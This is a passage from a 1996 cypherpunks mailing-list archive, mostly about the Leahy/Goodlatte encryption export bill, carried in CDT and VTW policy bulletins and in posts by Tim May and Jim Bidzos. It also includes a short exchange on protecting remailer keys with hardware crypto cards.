>secret key is protected in the card and can't be stolen, even by root,
>without physically stealing the card.  As long as the most of the remailers
>in your chain don't have compromised secret keys, it probably won't matter
>too much if the individual ops can examine the messages flowing through their
>remailer.
>
>The cards are getting cheaper and can be bought off the shelf (for now).
>The hardest part of retrofitting existing remailer software would probably be
>extracting the data from the remailer packet and formatting it properly for
>the card to do encryption operations on it (and back).

I just wrote and sent off to the list some thoughts on using cheap PC
hardware to do the crypto and remailer functions, thus taking the onus off
the networked box to do the same.

The idea of a _card_ is a good one, and one we did in fact kick around a
couple of years ago. Recall the days of the "Hardcard"? A Winchester
mounted on a card that plugged into a PC slot (this was back in the days
when slots for cards were sometimes much more available than spare drive
bay slots).

A crypto card is an elegant approach, but may be less hacker-available than
a really cheap PC. (And in my more paranoid moments, I imagine taking a
nice, steel-cased cheapo PC and welding it shut...won't stop someone from
seizing it and cutting it open, but you'd probably know if it
happened...or, a return to sealing wax and seal rings! A low-tech solution
to physical security, but something that may still be useful as an option.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Wed, 6 Mar 1996 04:02:17 +0800
To: vtw-announce@vtw.org
Subject: No Subject
Message-ID: <v02130505ad622688ad73@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
   _____ _____ _______
  / ____|  __ \__   __|   ____        ___               ____             __
 | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
 | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
 | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
  \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
  The Center for Democracy and Technology  /____/     Volume 2, Number 9
----------------------------------------------------------------------------
     A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 9                        March 5, 1996

 CONTENTS: (1) Bills To Relax Crypto Export Controls Introduced by Leahy,
               Burns, Goodlatte, Others
           (2) Subscription Information
           (3) About CDT, contacting us

This document may be redistributed freely provided it remains in its entirety
       ** Excerpts may be re-posted by permission (editor@cdt.org) **
-----------------------------------------------------------------------------

(1) BIPARTISAN BILLS TO EASE ENCRYPTION CONTROLS AND PROTECT INTERNET PRIVACY
    INTRODUCED IN SENATE AND HOUSE

A bipartisan group of members from both houses of Congress today introduced
legislation to lift many export controls on strong encryption hardware and
software and affirm the rights of Americans to use whatever form of
cryptography they choose. The bills, sponsored by Sen. Leahy (D-VT), Sen.
Burns (R-MT), Rep. Goodlatte (R-VA), Rep. Eshoo (D-CA), and others,
represent a major step towards breaking the stranglehold on encryption
technologies which for years has denied computer users access to vital
privacy-protecting applications.

The "Encrypted Communications Privacy Act of 1996" represents a rejection
of the Clinton Administration's invasive and unworkable "Clipper Chip" and
"Clipper II" key escrow policies. Under the guise of promoting so-called
"voluntary" encryption standards, these Administration efforts have sought
to use export controls to compel the adoption of key escrow encryption
domestically, and have left Internet users without adequate privacy and
security.

By relaxing export controls on "generally available" cryptographic
applications such as PGP, popular Web browsers, and other programs, the
Encrypted Communications Privacy Act of 1996 would encourage the
development and use of strong privacy protecting technologies. Major
provisions of the legislation would:

* Ease export controls on encryption products, allowing the export of
  'mass market' or 'generally available' cryptography. This would
  include products such as PGP or many of the popular Web browser
  programs.

* Affirm the right of Americans to use any encryption domestically. The
  bills explicitly prohibit the government from imposing any limits
  on the domestic use or sale of encryption.

* (Senate version only) Provide protections to those who choose to store
  their encryption keys with third parties by creating criminal and
  civil  penalties for the unauthorized disclosure of keys and strict
  requirements for law enforcement access.  The bill does not in any way
  affect the ability of any person to use encryption without a key
  escrow function..

The legislation also contains several provisions which CDT believes require
further clarification and consideration, including controversial language
that would create a new federal crime for the use of encryption to
willfully obstruct a law enforcement investigation. CDT will work with
Senators Leahy and Burns and Representatives Goodlatte, Eshoo, and other
interested members to address these concerns as the bill makes its way
through the legislative process.

The full text of both the House and Senate versions of the bills, along
with other relevant background information, is available on CDT's Crypto
Issues World Wide Web page:

  http://www.cdt.org/crypto/

CDT believes that the House and Senate encryption bills are an important
step forward in the ongoing attempts to build better security into the
information infrastructure through the widespread availability of
encryption. Congressional action is particularly welcome as the
Administration has continued to impose a flawed approach to encryption
based upon export controls, key length limits, and key escrow policies all
aimed at slowing the adoption of strong cryptography in the U.S. and
throughout the world.

While CDT believes improvements can be made in both bills, they establish a
solid framework for building a comprehensive, global cryptography policy.
CDT believes the bills deserve careful consideration and support. We look
forward to working with Senator Leahy, Senator Burns, Rep. Goodlatte, Rep.
Eshoo, individual Internet users, public interest advocates, and the
computer and communications industry to develop a cryptography policy that
protects privacy, security, and competitiveness on the Global Information
Infrastructure.

SUMMARY OF THE LEGISLATION: WHAT THE BILLS WOULD DO

The House and Senate bills both modify Title 18 of the U.S. Code to clarify
the status of encrypted communications, access to those communications by
law enforcement, and the liability of third-party key holders.  The bills
would:

* SIGNIFICANTLY EASE EXPORT CONTROLS: The bills would remove all export
  restrictions on "mass market" or publicly accessible encryption
  software and similar hardware -- that is, products that are generally
  available to the public and sold for installation "as is," or that are
  in the public domain such as PGP or some popular web browsers. (For
  example, products commercially available "off the rack," or freely
  available to the public via the Internet, would all be exportable.)
  Other encryption hardware would be exportable to countries where
  hardware with similar capabilities is already commercially available.
  The bills also allow export of other encryption software if it is
  currently exportable under law for use by foreign financial
  institutions.

* PROHIBIT ANY RESTRICTION ON THE DOMESTIC USE OR SALE OF ENCRYPTION:
  The bills would affirmatively prohibit any government restrictions or
  attempts to mandate the domestic sale or use of any type of
  encryption.

* IMPOSE CIVIL AND CRIMINAL LIABILITY FOR UNAUTHORIZED KEY DISCLOSURES:
  (Senate Version Only) The Senate bill would lay down privacy
  guidelines to protect those users who choose to store their  keys with
  third parties. The bill would impose civil and criminal penalties for
  the unauthorized release of decryption keys or other decryption
  assistance by third parties who individuals have entrusted with their
  keys. No privacy protections and only limited restrictions for law
  enforcement access currently exist for those who choose to store their
  keys with trusted third parties.

* PROVIDE LIMITS FOR ACCESS TO KEYS BY LAW ENFORCEMENT: (Senate Version
  Only) The Senate bill would also spell out limits and guidelines for
  law enforcement access to the keys of those users who have
  chosen to store their keys with third parties. Today, encryption keys
  held by third parties could be released to law enforcement with
  nothing more than a subpoena. Under the Senate bill, third parties
  could only provide assistance to law enforcement in decrypting
  communications if presented with a court order. The bill also limits
  the scope and duration of such assistance. Decryption keys for stored
  communications could be disclosed with a proper court order or
  subpoena.

* ESTABLISH A BROAD "PERSONAL USE EXEMPTION" FOR U.S. TRAVELERS: The
  bills would allow U.S. persons to use any form of encryption in a
  foreign country, establishing a less restrictive form of the "personal
  use exemption" recently published by the State Department. The
  provision is intended to accommodate "U.S. citizens and permanent
  residents who have the need to temporarily export encryption products
  when leaving the U.S. for brief periods of time". While the intent of
  this provision is clear, CDT believes that the language of the bill
  should be further clarified.

* PROHIBIT THE USE OF ENCRYPTION TO CONCEAL THE COMMISSION OF A FELONY:
  Finally, the bills would criminalize the use of encryption to
  willfully obstruct justice.  Anyone who "willfully endeavors" to use
  encryption for the purpose of obstructing, impeding, or preventing the
  communication to a law enforcement officer of information relating to
  a Federal felony would be subject to criminal penalties. CDT believes
  this new federal crime is unnecessary since it duplicates obstruction
  of justice crimes that are already available to prosecutors, and is
  unwise since it might be interpreted to discriminate against users of
  encryption.

BACKGROUND - BILLS ADDRESS LONG-STANDING FRUSTRATIONS WITH U.S.
             ENCRYPTION POLICY

Congressional action comes as Clinton Administration encryption
restrictions continue to jeopardize the security of computer users.
Encryption tools, which scramble electronic communications and data, are
widely viewed as the key to providing security and privacy and encourage
commerce on the Global Information Infrastructure.

Individuals need encryption in order to trust the GII with confidential
data such as financial transactions, medical records, or private
communications.  Businesses need encryption to provide individuals with
privacy protections they need and to protect their own proprietary
information as it flows across vulnerable global networks. The lack of good
encryption today has left computer users vulnerable to the prying eyes of
hackers, corporate competitors, and even foreign governments.

Current Administration policy restricts the export of "strong" encryption
hardware or software products with keys greater than 40 bits long. (The
length of encryption "keys" is often used to indicate the security of a
system.) Export controls actually influence the entire GII -- both
domestically and internationally -- due to the difficulty of distributing
and interoperating products with different strengths of encryption. The
level of security permitted under the export controls, and hence the level
of security largely available to domestic users as well, has been judged
woefully inadequate by many experts. Even the most recent Administration
"Clipper II" proposals would only allow the export of moderately stronger
encryption, and then only with "key escrow" restrictions to guarantee U.S.
government access to individual keys -- restrictions which raise real
Constitutional issues and are bound to fail in the competitive
international marketplace.

In recent months, groups from across the political spectrum have
increasingly criticized the Clinton Administration's restrictive export
controls. In November 40 companies, trade associations, and public interest
groups wrote to Vice President Gore calling the latest Administration
proposals flawed and inadequate. Last month a report by the CEOs of 13
leading U.S. technology companies found that U.S. industry stands to lose
up to $60 billion dollars per year by the year 2000 due to restrictions on
the export of cryptography. And several weeks ago a group of noted computer
security experts released a report calling for the deployment of
dramatically longer encryption key lengths of at least 75 to 90 bits.

The House and Senate bills give voice to this growing drumbeat of criticism
demanding a radical departure from the flawed approach of the Clinton
Administration's current encryption polices. CDT looks forward to working
with members of Congress to push for a more comprehensive U.S. encryption
policy that reflects the privacy and security needs of computer users.


FOR MORE INFORMATION

More information on the cryptography policy debate, including the text of
the Senate and House bills, is available on CDT's Cryptography Issues
Web Page:

http://www.cdt.org/crypto/

For More Information Contact:

Center for Democracy and Technology    +1.202.637.9800
  Daniel Weitzner, Deputy Director    <djw@cdt.org>
  Alan Davidson, Staff Counsel        <abd@cdt.org>

-----------------------------------------------------------------------
(2) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
more than 9,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.9                                           3/5/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Wed, 6 Mar 1996 04:04:20 +0800
To: cypherpunks@toad.com
Subject: (INFO) Leahy/Goodlatte introduce crypto bill
Message-ID: <199603051717.MAA13628@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


========================================================================
__     _________        __
\ \   / /_   _\ \      / /	Voters Telecommunications Watch (VTW)
 \ \ / /  | |  \ \ /\ / /		(We're not the EFF)
  \ V /   | |   \ V  V /	      URL:http://www.vtw.org/
   \_/    |_|    \_/\_/		Mar 5, 1996 (expires Apr 5, 1996)		  

       SEN. LEAHY (D-VT) AND REP. GOODLATTE (R-VA) INTRODUCE
             "ENCRYPTED COMMUNICATIONS PRIVACY ACT"
       TO THWART CLINTON ADMINISTRATION'S FLAWED CLIPPER PLAN


      Please widely redistribute this document with this banner intact
________________________________________________________________________
CONTENTS
	The Latest News
	Analysis of Leahy bill
	What You Can Do Now
	Chronology of Leahy bill
        Press Contact Information
        A few questions and answers
        Our policy on financial donations

________________________________________________________________________
THE LATEST NEWS

In the opening round of what promises to be a no-holds-barred fight
with the Clinton Administration and the Intelligence community over
cryptography policy, Senator Patrick Leahy (D-VT) and Representative
Robert Goodlatte (R-VA) presented bills today that intend to:

	-decontrol the export restrictions on mass-market and publicly
 	 available software such as Phil Zimmerman's "Pretty Good Privacy"
	 (PGP),
	-affirm Americans' right to use cryptography of their own choosing,
	-affirm Americans' right to *not* use key escrow systems,
	-make it a crime for an authorized key escrow agent to disclose a
	 key recklessly or intentionally, and
	-create a crime of using cryptography while committing a felony
	 for the express purpose of thwarting an investigation.

The topic of cryptography exports is crucial to the continued growth
and security of the Internet and online commerce.  The success of the
information economy in many cases hinges on the ability to employ
strong encryption techniques to protect confidential data.

The two bills come at a crucial time after the Clinton Administration
has put forth two flawed encryption proposals, Clipper and Son of
Clipper.  A third plan, this time in the form of legislation, is in the
works if one is to believe the rumors in the press.  So far the only
reason the Clinton Administration's flawed "Clipper" plans have been
paid any attention to at all is because they offer relaxed export
controls in return for storing your keys with government agencies or
quasi-government agencies.  The best part of the Leahy bill, though, is
that you can use the encryption export provisions without ever thinking
about using escrow.

Leahy's bill will ensure that few consumers, if any, ever consider another
Clinton-mandated encryption scheme ever again.

The Leahy/Goodlatte bill allows the export of most of the cryptographic
products you and I would would like to use, without any of the Clipper
requirements.  Without the lure of relaxed export for "Clippered"
products, nobody will pay attention to Clipper products.  This will
surely be the deadly blow to all present and future "Clipper" plans
that rely on the Clinton Administration's strongarm export policy
tactics.

A new Clinton proposal on encryption is rumored to be in the works.
However, judging from the way they've bungled the first two proposals,
VTW believes the newest Clinton proposal will be created with a similar
process, with little regard for the concerns of business, industry and
the public.

One thing is certain; there will be movement on encryption policy this
year.  It may be legislative or it may be regulatory; we're in a far
better position driving legislation we endorse, rather than lobbing
bombs at legislation being driven past us.

VTW believes this legislation is an excellent initiative.  We have long
advocated the decontrol of cryptography export laws based on the
following principles:

	-The public and businesses have the right to use the strongest
	 cryptographic products they (not the government) feel are necessary
	 to ensure the confidentiality of their private communications.
	-The public and businesses should never be compelled to use software
	 with escrow functionality, escrow agents, nor escrow agents that
	 do not have the public's confidence.
	-If the public and business should choose to use escrow agents,
	 the agents' primary responsibility should be to key owners, not to
	 law enforcement.  They should be mostly unregulated, and in an
	 ideal world, there should be hundreds, if not thousands to choose
 	 from.
	-Current export controls are outdated, don't work, are endangering
	 the worsening the problem of security of the Internet, and are
	 damaging the competitiveness of US companies in the global
	 marketplace.

The way Leahy/Goodlatte addresses export of cryptography is consistent
with our principles. VTW will keep you informed of its progress.  As
anyone familiar with the legislative process knows, a bill rarely ever
looks the same at the end of the process as it did at the beginning.
This bill is good for the Internet, and we intend to monitor it like
the watchdogs you expect us to be, to ensure that it does not
significantly deviate from the basic principles outlined above.

In doing this, it will be crucial for the Internet community to speak
up.  Big business will weigh in on this bill to protect their rights to
sell products with encryption in them.  However nobody will speak up
for your right to have a private conversation except you.

We're counting on you to find that voice, and use it over the next few
months to ensure that your present right to use encryption *of your
choice* isn't amended out of the bill.  There are some powerful forces
out there that will be lobbying heavily on this legislation.  The White
house is rumored to have their bill ready.  The law enforcement and
intelligence communities, who would rather you couldn't use strong
encryption, will be employing their usual scare tactics.  Worst of all,
the Clinton Administration, particularly Vice President Al Gore, who
should be a voice of reason for these issues, will, if the example of
Clipper and Son of Clipper is any indication, pander to law enforcement
and the anti-crime vote in an election year.

We predict that the White House will do everything in their power to
prevent Senator Leahy from liberating PGP.  He will need your help to
push forward.

Over the next few months, VTW will be coordinating a coalition of
names, many of which are already familiar to you.  This coalition will
ask you to call and write to Congress, expressing your opinion, and
threatening to back it up with the ultimate legitimate weapon of
democracy, your vote in this election year.

We're counting on you; we know you're up to it.

We urge you to visit our homepage at http://www.vtw.org/, where we'll
keep you updated on current events involving the bill.  If you haven't
already, you may want to subscribe to our vtw-announce list, no
discussion, low-volume email messages that will keep you updated
directly as we issue alerts and newsletters. In the wake of the
Telecomm Bill protests, over 3,000 of you have subscribed in less than
a month.  Use the one-line form on our home page.

P.S. We don't count our WWW page hits; we have better things to do.

________________________________________________________________________
ANALYSIS OF ENCRYPTED COMMUNICATIONS PRIVACY ACT

The Leahy and Goodlatte bills are not exactly alike.  For the moment,
we will concentrate on the Leahy bill for purposes of analysis.  We
find it to be fleshed out in many areas.

AFFIRMS OUR RIGHT TO USE CRYPTOGRAPHY OF OWN CHOOSING
The bill affirms that "Americans should be free lawfully to use
whatever particular encryption techniques, technologies, programs, or
products developed in the marketplace they desire in order to interact
electronically worldwide in a secure, private, and confidential
manner".  The bill also affirms our right to use cryptographic products
that do not have key escrow functions in them, or to choose not to use
such functions.  If we do choose to use escrow holders, the bill
affirms our right to use key holders of our own choosing.

DEREGULATION OF PUBLICLY-AVAILABLE CRYPTOGRAPHIC TECHNOLOGY
The bill addresses the "PGP problem" by making software that is
"generally available", "publicly available", or "public domain"
exportable with NO LICENSE REQUIRED, unless it is "specifically
designed for military use".

CREATES CRIMINAL PENALTIES FOR MALICIOUS KEY HOLDERS
If I designate a local business to be my key holder, it is important
that they take that responsibility seriously.  The bill creates
criminal penalties for key holders that behave recklessly with my
decryption keys.

Recently the Administration suggested that such individuals must be
licensed by the US Government, and in some cases, be required to
possess security clearances.  This would make them little more than
puppets of law enforcement.  The bill creates criminal penalties with
monetary fines if a key holder releases a key recklessly or
inappropriately. Reasonable rules for an escrow agents conduct are
described in the bill. These are discussed further below.

RAISES THE STANDARD FOR A COURT TO OBTAIN YOUR DECRYPTION KEY
Currently a court needs to only issue a simple search warrant to obtain
a copy of your key for decryption of your communications.  This bill
raises the requirement to be equivalent to that of a court-ordered
wiretap.

ENCOURAGES KEY HOLDERS TO SERVE THE INTERESTS OF KEY OWNERS WHEN
 PRESENTED WITH A COURT-ORDER
If you have chosen to use a key holder, they may find themselves in a
curious predicament if presented with a court order at some point in
the future.  They really don't want to simply hand over your decryption
key, since once it is divulged, it might be used to decrypt more
information than what is required under the court order.

The bill instructs a key holder to provide law enforcement with as
little information as possible, in order to satisfy a warrant request,
while still protecting as much of the key owner's confidentiality as
possible.

The bill accomplishes this by instructing a key owner to attempt to
deliver decrypted communications only for the times specified by the
warrant to law enforcement as a first step.  If the key holder is
unable to produce the decrypted communication for law enforcement, only
then, as a last resort, should a key holder relinquish your key.

This allows a key holder to work to protect the confidentiality of your
decryption keys, while still fulfilling both the spirit and letter of
the court order.

DISCOURAGES THE USE OF ENCRYPTION TO THWART A FELONY INVESTIGATION
This is probably the one provision we wouldn't have put in the bill,
were we drafting it.  Clearly added to appease law enforcement, it
creates a new crime to "willfully" attempt to thwart a law enforcement
investigation by using encryption.  VTW feels that such a crime is
unnecessary, but we're happy to see this is a fairly narrowly-tailored
statute.  It only applies to individuals who are engaging in a felony
and using encryption to communicate information while in the commission
of the felony, and whose intent, in using encryption, is to foil a law
enforcement investigation.

If you and a friend are talking with an encrypted phone, and you
mention that you think some mutual friend is cheating on their taxes,
you are not liable under this provision.  If you are planning the
Million Man March using encrypted email, and fear that you may be
investigated because your cause in unpopular in some law enforcement
circles, you are not liable because you are not committing a felony,
even though law enforcement may find it annoying that they cannot read
your mail.

This provision only applies to you if you are using encryption to
specifically foil a law enforcement investigation AND the communication
relates to a felony AND you are using the communication to commit the
felony.  VTW feels this is a fairly narrowly drawn statute that is not
likely to be easily abused.


Although this bill is the best thing we've seen in Congress on this
issue since ex-Rep. Maria Cantwell's (D-WA) export-of-encryption bill
was introduced to the 103rd Congress two years ago, there are still
some issues in the bill that bear further examination.  Let it be
understood that we think the balance of this bill right now will help
the net far more than hurt it and the net should step forward and help
Leahy and Goodlatte in their fight against the Administration over this
issue.  Nevertheless, our suggestions for tuning this bill are included
below.


BILL SHOULD INCLUDE AN EXPLICIT SUPPRESSION PROVISION
Although the Fourth Amendment is the law of the land, it is important
to note that it a applies to communications decrypted after an
erroneous warrant has been issued.  VTW feels that such a provision
should be enumerated in the bill, just to clarify any concerns a court
might have about such evidence.  It is also clear, however, that such a
provision is nearly impossible to obtain in the current Congressional
climate, though we will continue to urge the bill's sponsors to add
it.

THE BILL SHOULD CLEARLY INCLUDE ENCRYPTION PRODUCTS FOR STORED DATA
The bill addresses encryptions products used for wire or oral
communications, per the Electronic Communications Privacy Act.  Since
many encryption products are built for just this purpose, it includes
many of them.  However, we think it is appropriate to specifically
include products that are used only for encrypting stored data.

THE BILL SHOULD INSTRUCT ESCROW AGENTS TO REPORT DISCLOSURES AS WELL
The bill currently requires law enforcement to notify the Office of the
Courts as to the number of court orders served on key holders and for
what crimes the court orders were obtained.  The Office is required to
make this information public annually.

VTW feels that accountability should never be in short supply.
Requiring key holders to notify the Office of the Courts whenever they
are ordered to disclose a key will allow the public yet another way of
making sure that appropriate procedures are being followed to protect
the public.

We suggest an inexpensive reporting method such as registered mail so
as not to burden key holders needlessly.  Presumably, when the Office
of the Courts totals up its numbers every year, the number of
disclosures reported by law enforcement will add up to the SAME number
reported by key holders themselves.  Should there be a discrepancy, the
public will be grateful for the additional accountability.

NEW CRIMES ARE NEEDED TO DISCOURAGE MISREPRESENTING YOURSELF TO A KEY HOLDER
Currently the bill relies on existing laws that cover police
misrepresentation to punish law enforcement officials that misrepresent
themselves to a key holder with an improper or forged warrant to obtain
a key or a decrypted communication.

The majority of law enforcement officials are good people that would
never consider such an act.  Consequently, they should have nothing to
fear from such a statute.

VTW believes that a new statute is needed to dissuade those few
over-zealous law enforcement officials from violating the public's
trust in these matters.


On the whole, we believe that this bill is a win for the Internet
public and Internet businesses that require strong market-driven
cryptography.  VTW urges you to become familiar with it and support
Leahy and Goodlatte in their efforts.

________________________________________________________________________
WHAT YOU CAN DO NOW

1. It's crucial that you familiarize yourself with this bill.  You can
   find links to it at http://www.vtw.org/  If you are an ISP or run a
   WWW page, we urge you to place a pointer to the bill on your homepage
   or in your message of the day.  Here's a sample paragraph you can use:

	A bill has been introduced in Congress today that will decontrol
	many types of encryption products so they may be sold abroad,
	including the world-famous PGP.  To learn more about this
	legislation, see VTW's home page at http://www.vtw.org/

   Please remove this notice after a few days.

2. If you are an Internet Small Business, signon to VTW's Internet Small
   Business Coalition at http://www.vtw.org/help/   We'll likely be
   assembling a coalition of Internet small businesses in the next few
   weeks and will solicit your input on ways of carrying your message to
   Congress.

3. Join our vtw-announce mailing list by sending mail to majordomo@vtw.org
   or by signing up straight through our WWW page at http://www.vtw.org/.
   We'll be following this issue closely in the coming months.  Note that
   vtw-announce is not a discussion list.  It's VTW announcements, with
   little repeat content from other sources.

________________________________________________________________________
CHRONOLOGY OF THE 1996 LEAHY/GOODLATTE CRYPTO BILLS

Feb 26, '96	Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) introduce
		the Encrypted Communications Privacy Act.  Cosponsoring
		this legislation on the Senate side at Sen. Burns (R-MT)
		and Sen. Murray (D-WA).  On the House side are the
		following cosponsors:  DeLay, Campbell, Eshoo, Moorhead,
		Doolittle, Barr, Ewing, Mica, Everett, Bono, Lofgren, and
		McKeon.

________________________________________________________________________
A FEW QUESTIONS AND ANSWERS

Q: Does this require, or even urge individuals to use third parties to
   hold their decryption keys?
A: No way.  You can use the liberal export provisions in this bill with
   out ever allowing your keys to leave your "cold dead fingers".

Q: Does this advance the Clinton Administration's Clipper scheme in any way?
A: No, in fact this bill cuts out the very heart of the Clipper program.
   The two Clipper programs had the potential to be adopted because Clipper
   products were intended to receive preferential export treatment.  This
   allows the export of non-Clipper products.  In the global marketplace,
   the Clipper products will not be able to compete.  This bill is probably
   the final nail in the coffin of the Administration's flawed Clipper
   proposals.

Q: Bills change during Congressional deliberation. Could this bill
   change in such a way that VTW would no longer support it?
A: Absolutely. In fact, we consider it our mission to monitor the
   legislation to ensure that it isn't amended to act against the right
   of Internet users and businesses.

Q: Wasn't Goodlatte one of the bad guys on the Communications Decency Act?
   Why is he sponsoring this bill, and can we trust him?
A: Goodlatte did indeed introduce the fatal amendment that made the House
   version of the Telecomm Bill unsupportable. Nevertheless, VTW has found
   that a Congressperson's vote on one sort of bill is little indication of
   his or her stand on others. VTW wil closely examine any change in the
   language of the bill throughout its Congressional life.

Q: Does this create a requirement for key holders to exist, or for me to
   use programs that store keys with third parties?
A: No.  The bill affirms your right to use encryption without such a feature,
   and if you do use software with such a feature, to self-escrow the keys.
   In fact, key holders can exist today.

Q: Does this create a new obligations for key holders to disclose keys that
   they wouldn't have to comply with before?
A: No. In fact, this bill makes it harder for a law enforcement official to
   retrieve a key from a key holder, by requiring a wiretap request instead
   of a simple search warrant.

________________________________________________________________________
PRESS CONTACT INFORMATION

BY EMAIL (if your deadline is more than 24 hours away)
Send mail to vtw@vtw.org with "press deadline" in the subject line if
you are on a deadline.

BY PHONE (if your deadline is in less than 24 hours)
Call 718-596-2851 and follow the directions for contacting Steven Cherry
or Shabbir J. Safdar quickly.

________________________________________________________________________
OUR POLICY ON FINANCIAL DONATIONS

We do not accept unsolicited financial donations for our work.  If you
want to help further VTW's work, we urge you to register to vote.  Check
the Blue Pages of your local phone book for "Board of Elections".  You
should be able to obtain voter registration forms from them.

________________________________________________________________________
Copyright 1994-1996 Voters Telecommunications Watch.  Permission is granted
to copy and distribute this document for non-commercial purposes only,
provided that the above banner and this copyright notice appear in all
copies.  For other uses, see our Copyright Policy at
http://www.vtw.org/copyright.html
========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Mar 1996 08:12:42 +0800
To: cypherpunks@toad.com
Subject: Bidzos on CNBC, discussing Leahy's Bill
Message-ID: <ad61eb8d17021004e5dd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I'm watching Jim Bidzos being interviewed on CNBC...mainly about Leahy's
bill (he's in favor of it)....(One of the benefits of having CNBC business
news on all the time while I'm here online.)

He thinks it's a good bill, good for U.S. industry, good for
California...says some of the language in the bill still provides for "key
escrow" of some sort (I think he means the criminal use of crypto
provisions....).

He still thinks customers absolutely do not want any other parties to hold
their keys ("You don't give copies of the keys to your front door or your
filing cabinets to the government now, so why should you just because the
medium changes from filing cabinets to computer form."--paraphrased).

No further word on RSADSI going public, though. (I'm constantly surprised
that this hasn't happened, what will all the later-comers going public, and
the general hyping of "Internet security" (not that it isn't important,
just that it seems that any company with these magic words in its name or
prospectus zooms through the roof on IPO).

--Tim


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@RSA.COM (Jim Bidzos)
Date: Wed, 6 Mar 1996 09:32:05 +0800
To: tcmay@got.net
Subject: Bidzos on CNBC, discussing Leahy's Bill
In-Reply-To: <ad61eb8d17021004e5dd@[205.199.118.202]>
Message-ID: <9603052126.AA19534@RSA.COM>
MIME-Version: 1.0
Content-Type: text/plain



I'm in favor of the Bill because it specifically prevents, by law, the
US Govt from mandating key escrow. Also because it would, by law,
force export control of crypto out of the Dept. of State and into the
Dept.  of Commerce, effectively allowing any crypto used in the US and
"widely available" to be exported. (The bill does a few other things.
One, it provides for criminal penalties for key holders who abuse
their role as an escrow agent, assuming anyone *chose* to use key
escrow.  Second, it makes the use of encryption -any encryption- a
crime if used in the commission of or support of any criminal
activity. I think the bill would be better off without these
provisions, but I suspect this is an attempt to give the
administration something.)

I anticipate that the Administration, led by the intelligence and law
enforcement interests, will vigorously lobby against this bill...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 6 Mar 1996 06:51:01 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: (Fwd) Gov't run anon servers
In-Reply-To: <ad60b7a50a0210048ed0@[205.199.118.202]>
Message-ID: <9603051943.AA00595@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  We've talked about possible hardware security measures, even
>  those that only rely on physical box security. A box that does
>  decryption, mixing, readdressing, etc., without being part of
>  a Unix file system/network, could be a useful "Mom and Pop
>  remailer" (the idea being that small shop owners, "Mom and
>  Pop," could set this up, collect a little bit of spare change
>  as a remailing fee, and not even have access to the internal
>  state of the machine themselves.

While a solution like that would be optimal, even just a version of  
Mixmaster that can use a secure RSA card would do wonders for security.  The  
secret key is protected in the card and can't be stolen, even by root,  
without physically stealing the card.  As long as the most of the remailers  
in your chain don't have compromised secret keys, it probably won't matter  
too much if the individual ops can examine the messages flowing through their  
remailer.

The cards are getting cheaper and can be bought off the shelf (for now).   
The hardest part of retrofitting existing remailer software would probably be  
extracting the data from the remailer packet and formatting it properly for  
the card to do encryption operations on it (and back).


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Wed, 6 Mar 1996 05:34:08 +0800
Subject: "Zap part of the CDA" live Capitol Hill news conference on CU-SeeMe
Message-ID: <199603051850.NAA14816@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


ISP-TV Network Presents:

